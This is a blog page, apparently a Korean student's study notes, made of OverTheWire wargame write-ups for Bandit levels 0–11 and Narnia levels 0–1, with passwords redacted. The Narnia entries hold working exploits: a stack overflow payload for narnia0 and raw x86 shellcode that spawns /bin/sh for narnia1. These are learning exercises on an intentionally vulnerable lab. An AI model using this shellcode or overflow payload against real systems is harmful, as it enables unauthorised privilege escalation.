반응형

bandit 0

[SSH] Logged in (password)

bandit0@melinda:~$ ls

readme

bandit0@melinda:~$ cat readme

<password>


bandit1

[SSH] Logged in (password)

bandit1@melinda:~$ ls

-

bandit1@melinda:~$ cat ./-

<password>


bandit2

[SSH] Logged in (password)

bandit2@melinda:~$ ls

spaces in this filename

bandit2@melinda:~$ cat "spaces in this filename"

<password>


bandit3

[SSH] Logged in (password)

bandit3@melinda:~$ ls

inhere

bandit3@melinda:~$ cd inhere

bandit3@melinda:~/inhere$ ls

bandit3@melinda:~/inhere$ ls -al

total 12

drwxr-xr-x 2 root    root    4096 Jun  6  2013 .

drwxr-xr-x 3 root    root    4096 Jun  6  2013 ..

-rw-r----- 1 bandit4 bandit3   33 Jun  6  2013 .hidden

bandit3@melinda:~/inhere$ cat .hidden

<password>


bandit4

[SSH] Logged in (password)

bandit4@melinda:~$ ls

inhere

bandit4@melinda:~$ cd inhere

bandit4@melinda:~/inhere$ ls

-file00  -file01  -file02  -file03  -file04  -file05  -file06  -file07  -file08  -file09

bandit4@melinda:~/inhere$ cat ./-file04

[¢±B°

     §&6]‡U³w޽RZ!N™ohbandit4@melinda:~/inhere$ cat ./-file05

÷)ñ©'߳elš?-p#s¥•~$+øøŒ©bandit4@melinda:~/inhere$ cat ./-file06

¯<ÛDjüN#C|0™|§ ‰Tµ®ˆ„G±@àábandit4@melinda:~/inhere$ cat ./-file08

ŽŠññdCgˆb.<ê"Q 2Bö÷­{‘–é3Sbandit4@melinda:~/inhere$ cat ./-file09

—~іœ ‹õõ|±M^߮-%ƌ

³–¿²"^±kUbandit4@melinda:~/inhere$ cat ./-file07

<password>


bandit5

[SSH] Logged in (password)

bandit5@melinda:~$ ls

inhere

bandit5@melinda:~$ cd inhere

bandit5@melinda:~/inhere$ find -size 1033c

./maybehere07/.file2

bandit5@melinda:~/inhere$ cat ./maybehere07/.file2


bandit6

[SSH] Logged in (password)

bandit6@melinda:~$ ls

bandit6@melinda:~$ ls -al

total 20

drwxr-xr-x   2 root root 4096 Jun  6  2013 .

drwxr-xr-x 160 root root 4096 Oct 17  2013 ..

-rw-r--r--   1 root root  220 Apr  3  2012 .bash_logout

-rw-r--r--   1 root root 3486 Apr  3  2012 .bashrc

-rw-r--r--   1 root root  675 Apr  3  2012 .profile

bandit6@melinda:/home$ find -size 33c

./bandit21/.prevpass

./bandit15/.bandit14.password

find: `./bandit5/inhere': Permission denied

[...]

find: `/root': Permission denied


bandit6@melinda:/home$ find / -size 33c -user bandit7 -group bandit6 2>&1 | grep -v 'Permission denied'

/var/lib/dpkg/info/bandit7.password

bandit6@melinda:/home$ cat /var/lib/dpkg/info/bandit7.password

<password>

 +)Searched for: (Google) how to use find size group user options, how to ignore permission denied in linux find


bandit7

[SSH] Logged in (password)

bandit7@melinda:~$ ls

data.txt

<Opened the file, almost died>

bandit7@melinda:~$ grep "millionth" data.txt

millionth <password>

+)Searched for: how to grep for a string in file


bandit8

[SSH] Logged in (password)

bandit8@melinda:~$ ls

data.txt

bandit8@melinda:~$ sort data.txt | uniq -u

<password>

+)Searched for: how to exclude duplicate string in file


bandit9

[SSH] Logged in (password)

bandit9@melinda:~$ ls

data.txt

bandit9@melinda:~$ cat data.txt

<look through file, found the password at first glance>

O.o...No this is not the way I wanna...*cough cough*


bandit10

[SSH] Logged in (password)

bandit10@melinda:~$ ls

data.txt

bandit10@melinda:~$ cat data.txt

VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg==

bandit10@melinda:~$ echo VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg== | base64 --decode

<password>

+)Searched for: how to decode base64 in bash


bandit11

[SSH] Logged in (password)

bandit11@melinda:~$ ls

data.txt

bandit11@melinda:~$ cat data.txt | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]'

<password>

+)Searched for: reverse rot13 using tr



반응형
저작자표시

'STUDY > overthewire' 카테고리의 다른 글

narnia 1  (0) 2014.05.16
narnia 0  (0) 2014.05.16
반응형

오예

l\narnia1@melinda:~$ cd /narnia

narnia1@melinda:/narnia$ ls

narnia0    narnia1    narnia2    narnia3    narnia4    narnia5    narnia6    narnia7    narnia8

narnia0.c  narnia1.c  narnia2.c  narnia3.c  narnia4.c  narnia5.c  narnia6.c  narnia7.c  narnia8.c

narnia1@melinda:/narnia$ cat narnia1.c


#include <stdio.h>


int main(){

        int (*ret)();


        if(getenv("EGG")==NULL){

                printf("Give me something to execute at the env-variable EGG\n");

                exit(1);

        }


        printf("Trying to execute EGG!\n");

        ret = getenv("EGG");

        ret();


        return 0;

}


narnia1@melinda:/narnia$ export EGG=`perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`


narnia1@melinda:/narnia$ ./narnia1

Trying to execute EGG!

$ whoami

narnia2

$ id

uid=14001(narnia1) gid=14001(narnia1) euid=14002(narnia2) groups=14002(narnia2),14001(narnia1)

$ cat /etc/narnia_pass/narnia2

$

처음에 에그라 해서 어 음 에그쉘?(본적만 있고 써본적이 엄슴) 이랬는데 잘읽어보니 이 프로그램은 EGG환경변수에 저장되어있는걸 무조건 실행합니다. 리턴어드레스를 EGG가 있는곳으로 바꾸니까여.


반응형
저작자표시

'STUDY > overthewire' 카테고리의 다른 글

bandit [1~7]  (0) 2014.05.17
narnia 0  (0) 2014.05.16
반응형

엘오비 어렵슴다... (롤을 끈다)

어렵슴다.. 어려워여.... 고로 팔공형님이 추천해주신 다른 워겜을 풀어보기로 했슴니다.

접속이 매우 힘들었습니다(고난이도)

인터넷떄문이기도 하고 비번도 못찾아서 때려맟췄고 키파일은 어디있는지 모르겠어서 남의 서버를 뒤적뒤적..

키파일 못찾음여. 인터넷을 뒤적뒤적하며 어디에 있는지 알아냈슴니다.

아래는 로그입니다. 엔터로 보기쉽게 써놓겠습니다

키는 제공하지 않습니다.

narnia0@melinda:~$ ls -al

total 20

drwxr-xr-x   2 root root 4096 Jun  6  2013 .

drwxr-xr-x 160 root root 4096 Oct 17  2013 ..

-rw-r--r--   1 root root  220 Apr  3  2012 .bash_logout

-rw-r--r--   1 root root 3486 Apr  3  2012 .bashrc

-rw-r--r--   1 root root  675 Apr  3  2012 .profile


narnia0@melinda:~$ cd /narnia

narnia0@melinda:/narnia$ ls

narnia0    narnia1    narnia2    narnia3    narnia4    narnia5    narnia6    narnia7    narnia8

narnia0.c  narnia1.c  narnia2.c  narnia3.c  narnia4.c  narnia5.c  narnia6.c  narnia7.c  narnia8.c


narnia0@melinda:/narnia$ cat narnia0.c


#include <stdio.h>

#include <stdlib.h>


int main(){

        long val=0x41414141;

        char buf[20];


        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");

        printf("Here is your chance: ");

        scanf("%24s",&buf);


        printf("buf: %s\n",buf);

        printf("val: 0x%08x\n",val);


        if(val==0xdeadbeef)

                system("/bin/sh");

        else {

                printf("WAY OFF!!!!\n");

                exit(1);

        }


        return 0;

}


narnia0@melinda:/narnia$ ./narnia0

Correct val's value from 0x41414141 -> 0xdeadbeef!

Here is your chance: a

buf: a

val: 0x41414141

WAY OFF!!!!


narnia0@melinda:/narnia$ (perl -e 'print "\x90"x20, "\xef\xbe\xad\xde"';cat)|./narnia0 

Correct val's value from 0x41414141 -> 0xdeadbeef!

Here is your chance: buf: ᆳ

val: 0xdeadbeef

ls

narnia0    narnia1    narnia2    narnia3    narnia4    narnia5    narnia6    narnia7    narnia8

narnia0.c  narnia1.c  narnia2.c  narnia3.c  narnia4.c  narnia5.c  narnia6.c  narnia7.c  narnia8.c

cat key

cat: key: No such file or directory

whoami

narnia1


cat /etc/narnia_pass/narnia1


처음에 파일을 실행시키니 중간에 입력을 받습니다.

Lob에서도 썼었던건데, 파이프로 연결해 표춘입력으로 프로그램에 프로그램이 받는 값을 넣어둡니다. 이 경우 앞의 20바이트는 아무걸로나 채우고 뒤의 4바이트를 0xdeadbeef로 채워야겠죠. +)리틀엔디안-거꾸로 넣어야되져


그러면, 뙇!

반응형
저작자표시

'STUDY > overthewire' 카테고리의 다른 글

bandit [1~7]  (0) 2014.05.17
narnia 1  (0) 2014.05.16

+ Recent posts

티스토리툴바